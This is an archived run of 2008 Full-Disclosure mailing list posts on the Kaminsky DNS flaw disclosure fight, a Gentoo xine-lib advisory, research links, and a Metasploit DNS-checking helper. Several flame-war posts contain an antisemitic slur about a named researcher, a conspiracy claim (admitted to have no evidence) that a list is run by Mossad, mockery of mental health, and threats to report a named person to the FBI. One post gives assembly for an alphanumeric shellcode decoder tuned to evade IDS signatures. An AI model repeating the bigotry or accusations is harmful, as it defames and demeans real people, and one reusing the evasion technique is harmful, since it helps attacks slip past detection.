<21881.1217962645@turing-police.cc.vt.edu> Message-ID: <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> On Tue, Aug 5, 2008 at 7:57 PM, wrote: > On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said: > >> Are you suggesting HD Moore had prior knowledge that the Austin Texas >> AT&T servers were vulnerable? > > No - simply saying that either they were vulnerable, or they weren't. If > they weren't vulnerable, HD didn't have to do anything. And even if they > *were*, somebody would still have to actually *attack* them. > > And even if they *got* attacked, it's quite possible that the upsides of not > bothering to do something outweighed the risks. If you estimate that the > cost (including "things you could have spent your time doing") is more than > the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But > in the time I'd waste dealing with the issue, I could generate something that > will get us $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore > it, I come out $1,500 ahead if we get hit, and $2,000 if we don't". > Is what you're describing not against the law Valdis, it sure sounds like it to me. Some kind of gross negligence... http://legal-dictionary.thefreedictionary.com/Gross+negligence http://legal-dictionary.thefreedictionary.com/negligence Is this what goes on at Virginia Tech on a regular basis? Maybe the authorities should be looking into you a lot more while they are looking into HD Moore. ;) I wonder if the the intelligence services thought like you before 9/11 and 7/7 eh...I get the feeling they did. For sure people like you who support this kind of activity should be investigated. It sounds criminal. Have you ever carried out this kind of activity Valdis where you put security and people at risk to make and/or save money? If cyber-terrorism is going to become a real threat, we don't need people like Valdis around and we should sure keep track of him. Would you allow a cyber-9-11 to happen Valdis if there was money involved? I'm starting to become worried about you dude, maybe I should be e-mailing the folks at Virginia Tech this thread, and perhaps, just perhaps the F.B.I and see what they think about what you've just told me. You seem to be normalizing what you've just described to me as normal run-of-the-mill legal activity, when it clearly isn't. To me what you've just described is illegal, criminal and wrong. All the best, n3td3v From avri.schneider at gmail.com Tue Aug 5 21:31:52 2008 From: avri.schneider at gmail.com (Avraham Schneider) Date: Tue, 5 Aug 2008 23:31:52 +0300 Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection In-Reply-To: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org> References: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org> Message-ID: Oops - that is not correct - it will only work when the second and third bits of ESP are 0 :-) I was to quick on the send button. EAX is basically XOR's with the length of the string, and instead I need to increment it by the length of the string... I'll have to come up with a better solution... (I'll probably have to resort to patching... but I was looking for a quick and dirty fix) If anyone comes up with a solution for this before me, I'll buy them a Shawarma next time they're in Israel ;-) Regards, Avri On Tue, Aug 5, 2008 at 7:00 PM, Avraham Moshe Schneider wrote: > I fixed a couple of bugs - > > 1. The srand() function was called after calls to rand() - causing a fixed string in the decoder which an IDS could signature on > 2. Case of ESP register pointing to the head of the decoder was not handled, it is fixed now, but needs to be randomized. Right now, in the case of ESP pointing to the shellcode, the following fixed string would exist at the head of the decoder routine: "TX4640" > This translates to: > _asm > { > push esp; > pop eax; > xor al, 0x36; > xor al, 0x30; > } > > The '6' and the '0' can be any alphanumeric byte where the first is the second+6 or vice versa. > > You may add alphanumeric NOP instructions in between and change the diff between the bytes accordingly. > The diff between the two XOR values should be the length of the resulting string. > > I used the EAX register, as XOR'ing it with an immediate value is alphanumeric. > > Regards, > Avri > ********************************************************************************************** > > The contents of this email and any attachments are confidential. > It is intended for the named recipient(s) only. > If you have received this email in error please notify the system manager or the > sender immediately and do not disclose the contents to anyone or make copies. > ** eSafe scanned this email for viruses, vandals and malicious content ** > > ********************************************************************************************** > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From Valdis.Kletnieks at vt.edu Tue Aug 5 21:57:53 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 05 Aug 2008 16:57:53 -0400 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: Your message of "Tue, 05 Aug 2008 20:36:12 BST." <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> Message-ID: <27503.1217969873@turing-police.cc.vt.edu> On Tue, 05 Aug 2008 20:36:12 BST, n3td3v said: > Is what you're describing not against the law Valdis, it sure sounds > like it to me. Some kind of gross negligence... Note that it's "gross negligence" only if there is a *high* risk of *actual* damages that a reasonable person should have forseen. Also, in the vast majority of cases, the concept only applies to events you actually have control over - so in this instance, HD Moore could *conceivably* be negligent towards *his* company, but if *other* customers of ATT suffer because ATT doesn't fix their stuff, that's ATT's problem, not HD's. However much you may *want* it to be HD's fault for not contacting ATT and warning them, the law usually doesn't work that way - nor do you *want* it to. If HD was required to warn ATT, then the readers of FD would *also* be required to contact the police in your area and warn them that there was a clueless and mentally unstable person wandering around with significant chance of serious injury to themselves... For bonus points - identify the actual *LOSS* to HD Moore from the DNS getting hacked. Looks to *me* like he came out *ahead* - he got more headlines talking about it than you can ever hope to get. > I wonder if the the intelligence services thought like you before 9/11 > and 7/7 eh...I get the feeling they did. Yes, and since then, we've *failed* to do proper risk analysis. We've spent some five hundred billion dollars and gotten some 6,000 soldiers killed to prevent another attack that kills 3,000 and does 10 billion dollars in damage. So far, we're about 3,000 people and $490,000,000,000 in the hole. And here's news for you: Many government agencies *still* do calculations that way. They calculate a "value of a life", and use it to evaluate things like environmental and safety regulations: If a life is worth $5M, and the regulation is projected to save 500 lives (via lower risk of cancer, fewer car crashes, whatever), the regulation has to cost less than $2.5B to implement to be worth it. If it costs $2B, but only saves 50 lives, that's $40M per life and not worth it. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/a3dd6a5b/attachment.bin From research at sec-consult.com Tue Aug 5 23:28:12 2008 From: research at sec-consult.com (Bernhard Mueller) Date: Wed, 6 Aug 2008 00:28:12 +0200 Subject: [Full-disclosure] Interesting things at sec-consult.com, DNS-whitepaper available tomorrow Message-ID: <1217975292.8503.20.camel@b4byl0n> Hello, We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at SEC Consult website. The presentations (some of which are in german) will include everything from general howtos to highly specialized pentesting-stuff. We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow. We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :) The presentations and whitepapers, along with our past presentations from Blackhat and Deepsec, can be found at: http://www.sec-consult.com/publikationen_e.html Here are some links to what is already online: * A german guide to WEP/WPA cracking, by Johannes Greil: http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf * A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications): http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf * A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl: http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf I hope that some of you will find this useful. Regards, Bernhard (Certified Internet Security Superstar) -- _________________________________________ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile +43 676 840301 718 email b.mueller at sec-consult.com Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstra?e 10, A-2700 Wiener Neustadt Advisor for your information security. From research at sec-consult.com Tue Aug 5 23:22:59 2008 From: research at sec-consult.com (Bernhard Mueller) Date: Tue, 5 Aug 2008 22:22:59 +0000 Subject: [Full-disclosure] (no subject) Message-ID: <1217974979.8503.16.camel@b4byl0n> Hello, We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at SEC Consult website. The presentations (some of which are in german) will include everything from general howtos to highly specialized pentesting-stuff. We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow. We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :) The presentations and whitepapers, along with our past presentations from Blackhat and Deepsec, can be found at: http://www.sec-consult.com/publikationen_e.html Here are some links to what is already online: * A german guide to WEP/WPA cracking, by Johannes Greil: http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf * A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications): http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf * A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl: http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf I hope that some of you will find this useful. Regards, Bernhard (Certified Internet Security Superstar) -- _________________________________________ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile +43 676 840301 718 email b.mueller at sec-consult.com Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstra?e 10, A-2700 Wiener Neustadt Advisor for your information security. From redhowlingwolves at nc.rr.com Tue Aug 5 21:41:27 2008 From: redhowlingwolves at nc.rr.com (scott) Date: Tue, 05 Aug 2008 16:41:27 -0400 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <21881.1217962645@turing-police.cc.vt.edu> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> Message-ID: <4898BAF7.5050100@nc.rr.com> Valdis.Kletnieks at vt.edu wrote: > On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said: > > > Are you suggesting HD Moore had prior knowledge that the Austin Texas > > AT&T servers were vulnerable? > > No - simply saying that either they were vulnerable, or they weren't. If > they weren't vulnerable, HD didn't have to do anything. And even if they > *were*, somebody would still have to actually *attack* them. > > And even if they *got* attacked, it's quite possible that the upsides of not > bothering to do something outweighed the risks. If you estimate that the > cost (including "things you could have spent your time doing") is more than > the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But > in the time I'd waste dealing with the issue, I could generate something that > will get us $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore > it, I come out $1,500 ahead if we get hit, and $2,000 if we don't". > > > > ------------------------- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ You can't expect n3td3v to understand things like that. He's a hero to all who read his cut-n-paste blog, not a true InfoSec worker. From xploitable at gmail.com Wed Aug 6 00:47:47 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 6 Aug 2008 00:47:47 +0100 Subject: [Full-disclosure] more rehashes of xss & 'evil gif' In-Reply-To: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> References: <1278b0690808042226o6e5a322cgefee8c12378c3099@mail.gmail.com> Message-ID: <4b6ee9310808051647m68c24127n941e2b8cbf91ab2@mail.gmail.com> On Tue, Aug 5, 2008 at 6:26 AM, Robert Holgstad wrote: > http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html > > seems dan isn't the only press whore around! rebouncing from his embarasing > post about 'deputy dan' and the matasano blog - whoosh anyone? nate and his > crew of javascript gurus have whipped up another rehash of an old class of > bugs that has been used in the wild for a long time. we personally want to > thank nate for his great work hes done for conferences over the years > filling up their talking spots with useless crap. his work is only rivaled > by gadi evron who gets accepted to every conference because declining a fat > AND jewish person is guarenteed to get 1000s of big nosed ambulance chasers > after you by the end of business day. > > once again we would ilke to thank nate for his cutting edge research and > hopefully he will get nommed for next years pwnie life time acheivement > award! > Don't forget Funsec is run by Mossad and that all the silly people on that list who post on it don't realise what intelligence organization they are contributing to. Of course there is no publically available information to prove Gadi Evron has connections with Mossad, but I personally assume its probably the case. All the best, n3td3v From rbu at gentoo.org Wed Aug 6 01:02:36 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Wed, 6 Aug 2008 02:02:36 +0200 Subject: [Full-disclosure] [ GLSA 200808-01 ] xine-lib: User-assisted execution of arbitrary code Message-ID: <200808060202.40999.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: xine-lib: User-assisted execution of arbitrary code Date: August 06, 2008 Bugs: #213039, #214270, #218059 ID: 200808-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== xine-lib is vulnerable to multiple buffer overflows when processing media streams. Background ========== xine-lib is the core library package for the xine media player, and other players such as Amarok, Codeine/Dragon Player and Kaffeine. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/xine-lib < 1.1.13 >= 1.1.13 Description =========== Multiple vulnerabilities have been discovered in xine-lib: * Alin Rad Pop of Secunia reported an array indexing vulnerability in the sdpplin_parse() function in the file input/libreal/sdpplin.c when processing streams from RTSP servers that contain a large "streamid" SDP parameter (CVE-2008-0073). * Luigi Auriemma reported multiple integer overflows that result in heap-based buffer overflows when processing ".FLV", ".MOV" ".RM", ".MVE", ".MKV", and ".CAK" files (CVE-2008-1482). * Guido Landi reported a stack-based buffer overflow in the demux_nsf_send_chunk() function when handling titles within NES Music (.NSF) files (CVE-2008-1878). Impact ====== A remote attacker could entice a user to play a specially crafted video file or stream with a player using xine-lib, potentially resulting in the execution of arbitrary code with the privileges of the user running the player. Workaround ========== There is no known workaround at this time. Resolution ========== All xine-lib users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.13" References ========== [ 1 ] CVE-2008-0073 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0073 [ 2 ] CVE-2008-1482 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1482 [ 3 ] CVE-2008-1878 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1878 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/c01b05a4/attachment.bin From peak at argo.troja.mff.cuni.cz Wed Aug 6 01:07:26 2008 From: peak at argo.troja.mff.cuni.cz (Pavel Kankovsky) Date: Wed, 6 Aug 2008 02:07:26 +0200 (MET DST) Subject: [Full-disclosure] Kaminsky's Law In-Reply-To: <4b6ee9310807250356y5282dbbfr750a8a27c5a94079@mail.gmail.com> Message-ID: <20080806020147.339.0@argo.troja.mff.cuni.cz> On Fri, 25 Jul 2008, n3td3v wrote: > - That the people who release information and/or code early, they get > fined for every computer system compromised because of the > vulnerability information and/or code disclosure, on top of the jail > sentence. Heh, is it going to include the vulnerable code (or protocol specification or whatever) itself? After all, the vulnerable code (or protocol or whatever) contains all the information needed to exploit it! -- Pavel Kankovsky aka Peak / Jeremiah 9:21 \ "For death is come up into our MS Windows(tm)..." \ 21th century edition / From ureleet at gmail.com Wed Aug 6 01:18:38 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:18:38 -0400 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <4898BAF7.5050100@nc.rr.com> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4898BAF7.5050100@nc.rr.com> Message-ID: <6158bb410808051718q1a5d6b29xfa613db8931c27d6@mail.gmail.com> On Tue, Aug 5, 2008 at 4:41 PM, scott wrote: > You can't expect n3td3v to understand things like that. He's a hero to > all who read his cut-n-paste blog, not a true InfoSec worker. been saying that for awhile now. okay, so from now on, everyoen run everything you do through n3td3v. let him b the final approval for all things infosec. that way he cant bitch anymore and he'll stfu. From ureleet at gmail.com Wed Aug 6 01:19:01 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:19:01 -0400 Subject: [Full-disclosure] Fwd: Comment on: Microsoft to give partners heads-up on security vulnerabilities In-Reply-To: <4b6ee9310808050827g6c1d8026p127cefb8c41f1918@mail.gmail.com> References: <4b6ee9310808050824q10183d31l79fd14328899ebc@mail.gmail.com> <4b6ee9310808050827g6c1d8026p127cefb8c41f1918@mail.gmail.com> Message-ID: <6158bb410808051719m10b3bd8md41fcac33795e805@mail.gmail.com> theyve been doing this 4 years. get in the now. On Tue, Aug 5, 2008 at 11:27 AM, n3td3v wrote: > ---------- Forwarded message ---------- > From: n3td3v > Date: Tue, Aug 5, 2008 at 4:24 PM > Subject: Comment on: Microsoft to give partners heads-up on security > vulnerabilities > To: n3td3v > > > by n3td3v August 5, 2008 8:17 AM > > Verbal contracts of non-disclosure agreements don't work, you need a > new law in place, which I call the responsible disclosure act, > http://seclists.org/fulldisclosure/2008/Jul/0439.html to enforce the > agreement by a law if the agreement is broken. Or are you guys just > gonna do another "oops the cat's out the bag" again like what happened > with the verbal contract agreement Dan Kaminsky had with everyone > before a blog entry leaked the vulnerability by *accident*. Is this > Microsoft agreement of non-disclosure actually enforceable by any > current law? If not a new law is needed to be drawn up, see the link > above, or this "Microsoft Active Protection Program" is gonna turn out > a complete shambles. > > http://news.cnet.com/8601-1009_3-10006325.html?communityId=2114&targetCommunityId=2114&messageId=772539#772539 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:20:30 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:20:30 -0400 Subject: [Full-disclosure] Fwd: Are Bug Disclosures Helping or Hurting? In-Reply-To: References: <4b6ee9310807300640n2926b00dk4581134e615ee884@mail.gmail.com> <4b6ee9310807300649v3425124ftc984049c7eb7e43a@mail.gmail.com> <4b6ee9310807301354j1428205ctd16766c13c92530a@mail.gmail.com> Message-ID: <6158bb410808051720ua0e81c7h1df4654f4aaf12bc@mail.gmail.com> oh, hes admitting it now. On Thu, Jul 31, 2008 at 3:10 AM, Knud Erik H?jgaard wrote: > On Wed, Jul 30, 2008 at 10:54 PM, n3td3v wrote: > >> So far my mental health has been in decline > > Yes, we can tell. > -- > knud > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:21:21 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:21:21 -0400 Subject: [Full-disclosure] Re : CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit In-Reply-To: <200807251438.20812.fdlist@digitaloffense.net> References: <1216856066.3153.76.camel@localhost> <48895415.4040304@micom.mng.net> <6e1123bc0807251205l6cf1069bu63a0717c9a3ddef2@mail.gmail.com> <200807251438.20812.fdlist@digitaloffense.net> Message-ID: <6158bb410808051721s58329b11m46f2f47ff26dfbb6@mail.gmail.com> noice!!! On Fri, Jul 25, 2008 at 3:38 PM, H D Moore wrote: > On Friday 25 July 2008, tixxDZ wrote: >> I do not want to offend anyone (Metasploit people), this is a simple >> joke: can you share with us all the logs of the vulnerable servers ? >> ;) , the exploit will use the Metasploit service to verify >> exploitability. ex checking my Opendns: > > The exploit needs a service to determine the source port used by the > target name server. The 'check' command will do this and could probably > use a better warning about information disclosure. The exploit itself > will also query the Metasploit service if you set SRCPORT to 0. While > this means we *could* capture a list of vulnerable nameservers which > query this service, honestly we don't care and aren't logging it. There > are much more effective ways to scan for exploitable cache servers :-) > > The source code for the helper service is also a Metasploit module and can > be found under modules/auxiliary/server/dns/spoofhelper.rb > > If you want to use your own server for this, just change > *.red.metasploit.com to be a domain handled by your own copy of the > spoofhelper module. In the future, we will add an option to specify a the > nameserver used for this check. > > To clarify: > > - Nothing is sent to metasploit.com unless SRCPORT is manually set to '0' > or the check command is run (non-standard for aux modules). > > - The only information we receive is the IP and source port of the tested > nameserver. No information is sent about the user's system or their own > IP address. > > - Even though this information could be logged and sorted and whatnot, we > honestly don't care and just added it as a convenience feature. We dont > keep records of the queries hitting the server and have no plans to start > doing so. > > - If you don't like it, don't run 'check' and don't set SRCPORT to '0' > for automatic mode. It won't hurt our feelings and you are free to modify > the module to point at your own helper service. > > Cheers, > > -HD > > > PS. You can use the service outside of the module to check various > servers. For example: > > while true; do dig +short -t TXT `date +%s`.red.metasploit.com @4.2.2.3; > sleep 1; done > "209.244.4.227:33165 1217014609.red.metasploit.com" > "209.244.4.227:32728 1217014610.red.metasploit.com" > "209.244.4.227:29607 1217014611.red.metasploit.com" > "209.244.4.227:28032 1217014612.red.metasploit.com" > "209.244.4.227:25992 1217014613.red.metasploit.com" > "209.244.4.227:31301 1217014614.red.metasploit.com" > "209.244.4.227:22884 1217014615.red.metasploit.com" > "209.244.4.227:33722 1217014616.red.metasploit.com" > > ^- changing ports means the box is patched. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:23:32 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:23:32 -0400 Subject: [Full-disclosure] Nominate Dan Kaminsky for Most Overhyped Bug Pwnie Award In-Reply-To: <4b6ee9310807230200o6193f3b6jec06ba5738e80da3@mail.gmail.com> References: <4b6ee9310807230200o6193f3b6jec06ba5738e80da3@mail.gmail.com> Message-ID: <6158bb410808051723r3cae2526s1d314f9cf39dc48e@mail.gmail.com> hey, how overhyped is the shit now that its in the while and proving ur ass wrong bitch? On Wed, Jul 23, 2008 at 5:00 AM, n3td3v wrote: > On Fri, Jul 11, 2008 at 9:22 PM, Sandy Vagina wrote: >> >> n3td3v wrote: >> > Please nominate Mr.DNS aka Dan Kaminsky for Most Overhyped Bug on the >> > Pwnie Awards 2008. >> >> Perhaps if you bothered to read anywhere close to as much as you >> write, you would have seen that Dino, one of the judges, specifically >> disqualified this bug from the Pwnies for being too awesome: >> >> http://blog.trailofbits.com/2008/07/09/dan-kaminsky-disqualified-from-most-overhyped-bug-pwnie/ >> > > Hi Sandy Vagina, > > Looks like they did a U-turn after realising how over hyped the bug actually is. > > Nominees > > " > Unspecified DNS cache poisoning vulnerability (CVE-2008-1447) > > Dan Kaminsky > > Dan Kaminsky is credited with discovering some unspecified > vulnerabilities in DNS that allow for cache poisoning on a massive > the-intarweb-tubes-will-burst-and-flood-your-basement scale. There has > been massive media attention over this vulnerability and a large > amount of backlash in the security community over the lack of details. > When the full details of the vulnerability are revealed at BlackHat, > the masses will decide whether the hype and secrecy were worth it. > And, more importantly, the Pwnie Judges will vote on whether Dan gets > the Pwnie for Most Overhyped Bug. > > " > > http://pwnie-awards.org/2008/awards.html#overhypedbug > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:25:32 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:25:32 -0400 Subject: [Full-disclosure] Kaminsky's Law In-Reply-To: <002401c8ee4e$087f4f40$1214dd80@corp.emc.com> References: <4b6ee9310807250356y5282dbbfr750a8a27c5a94079@mail.gmail.com> <002401c8ee4e$087f4f40$1214dd80@corp.emc.com> Message-ID: <6158bb410808051725o6edd6ce2x3414eb0ee45b8485@mail.gmail.com> im not an alias of n3td3v. my penis isn't as big as his. On Fri, Jul 25, 2008 at 8:00 AM, Exibar wrote: > I think we should have "n3td3v's law" where n3td3v and all his aliases > (professor, uleet, , etc) are required to > get signed written authorization from the community before he can post a > single message....anywhere.... if it's not a unanimous agreement that he > can post, and he does so anyway, he goes to jail.... > > > ----- Original Message ----- > From: "n3td3v" > To: > Sent: Friday, July 25, 2008 6:56 AM > Subject: [Full-disclosure] Kaminsky's Law > > >> So what you're saying is HD Moore and |)ruid are exploiting a loop >> hole in the law to do what they do... looks like we need to get the >> law tightened. >> >> I say a "Responsible Disclosure Act" is drawn up, and anyone who >> breaks it goes to jail. >> >> That will mean: >> >> - People will think twice before hitting send on blog entries, >> >> - People will think twice about releasing code early, >> >> - That the decided time line for disclosure can be enforced, >> >> - That the people who release information and/or code early, they get >> fined for every computer system compromised because of the >> vulnerability information and/or code disclosure, on top of the jail >> sentence. >> >> So instead for the future its not just a verbal contract for >> responsible disclosure, its a legally binding contract as well meaning >> if the Responsible Disclosure Act has been signed by the security >> researcher and its affected vendors, then ass hats like HD Moore and >> |)ruid are breaking the law. >> >> The details are a bit fuzzy right now, but i'm sure the big guys in >> the industry can draw up proper rules for a Responsible Disclosure >> Act. >> >> Its likely the Responsible Disclosure Act would only be used in >> exceptional circumstances like this DNS caching vulnerability, and the >> approval of the act per vulnerability case has to be decided on by a >> judge in a court of law, so that the Responsible Disclosure Act can't >> be over used and abused, to keep the use of the act fair and >> proportional in relation to the level of the threat. >> >> That means, Full-Disclosure of vulnerability information and/or >> wouldn't be illegal all the time, just in exceptional circumstances >> that has to be OK'd by a judge. >> >> This safe guards the deployment of a patch or patches while telling >> what the importance of patching is to the public, while disallowing >> security researchers to release information and/or code before the >> time line for responsible disclosure. >> >> So the scenario would be, >> >> jake: hey did you hear about the patches being deployed and the news >> reports about the flaw and why the patch is critical? >> >> joe: yes, but the responsible disclosure act has been signed so we >> need to wait until it expires before we can share info. >> >> jake: no way, whats the assigned disclosure date? >> >> joe: the standard 4 weeks, although with the responsible disclosure >> act, after the 4 weeks, the security researcher and vendors can go >> back to the judge to ask for an extra 4 week extension onto that, so >> it could be eight weeks bro before we can become famous for five >> minutes by releasing attack code. >> >> jake: ah, sucks for us, but yeah if the judge has approved the signing >> there isn't alot we can do unless we want to be labeled criminals, and >> hunted down by interpol. >> >> What has to be told to the community under the act: >> >> - The community must be told the Responsible Disclosure Act has been >> signed and OK'd by a judge. >> >> - The community must be told the date the Responsible Disclosure Act >> expires and disclosure can be made. >> >> - The community must be told that security researcher and vendor can >> go back to the judge after 4 weeks and ask for extension of the act if >> extra time is needed, this must be announced to the community again >> with notice. >> >> All members of the community who break the Responsible Disclosure Act >> are breaking the law and face charges. >> >> Obviously this is just an email I rattled up in five minutes during a >> water machine break, so the big guys in the industry can take these >> ideas and throw them into a properly put together act. >> >> I think Dan Kaminsky should lobby the industry and the government to >> get something like this drawn up, since he is the one who has inspired >> me to come up with the Responsible Disclosure Act. >> >> I kind of feel sorry for Dan Kaminsky, and that HD Moore and |)ruid >> had to be dick heads about releasing code on purpose against his >> request of Dan Kaminsky, the vendors and people who agree with >> responsible disclosure, especially in exceptional circumstances like >> the DNS flaw. >> >> Maybe we should name it "Kaminsky's Law" out of Solidarity for Dan. >> >> All the best, >> >> n3td3v >> >> >> ---------- Forwarded message ---------- >> From: >> Date: Thu, Jul 24, 2008 at 5:56 PM >> Subject: Re: [Full-disclosure] Comments on: DNS exploit code is in the >> wild >> To: n3td3v >> Cc: full-disclosure at lists.grok.org.uk >> >> >> On Thu, 24 Jul 2008 16:17:08 BST, n3td3v said: >> >>> This whole HD Moore savior of info sec thing has gone on long enough, >>> its time to see him for what he is and get him slammed up in jail >>> along with his counterpart |)ruid. >> >> I'll point out that you happen to live in the country that invented the >> concept of "habeus corpus". In other words, you cant slam him in jail >> unless you actually *charge* him with something. >> >> Please tell us which countr(y|ies) you intend to have him charged, and >> what >> offense. Specific references to statutes would be appreciated (for >> starters, >> I'll help you out and point out that in the US, he probably could *not* be >> charged under 17 USC 1201 (the DMCA anti-circumvention clause), nor under >> 18 >> USC 1030 (the primary federal anti-hacking statute), unless you have >> actual >> evidence that HD personally hacked into a computer covered by 18 USC 1030. >> You >> run into similar issue with 18 USC 2701 (access to stored communication). >> >> You *might* be able to make a case under 18 USC 2512 (dealing in devices 